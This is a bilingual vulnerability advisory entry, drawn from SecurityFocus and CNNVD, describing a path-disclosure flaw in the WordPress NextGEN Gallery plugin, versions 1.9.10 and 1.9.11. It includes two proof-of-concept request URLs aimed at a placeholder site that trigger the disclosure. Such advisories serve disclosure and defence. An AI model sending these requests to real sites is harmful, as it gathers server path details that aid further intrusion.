WordPress NextGEN Gallery插件路径泄露漏洞

https://www.exploit-db.com/exploits/38314
https://www.securityfocus.com/bid/57957
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201302-398

WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress中的NextGENGallery插件中存在路径泄露漏洞。攻击者利用该漏洞获得敏感信息有助于进一步攻击。NextGENGallery1.9.10和1.9.11版本中存在漏洞，其他版本也可能受到影响。

source: http://www.securityfocus.com/bid/57957/info

The NextGEN Gallery plugin for WordPress is prone to a path-disclosure vulnerability. 

An attacker can exploit this issue to obtain sensitive information that may lead to further attacks. 

NextGEN Gallery versions 1.9.10 and 1.9.11 are vulnerable; other versions may also be affected.

http://www.example.com/?callback=json&api_key=true&format=json&method=gallery&id=1 

http://www.example.com/?callback=json&api_key=true&format=xml&method=recent&limit=1

来源:BID
名称:57957
链接:http://www.securityfocus.com/bid/57957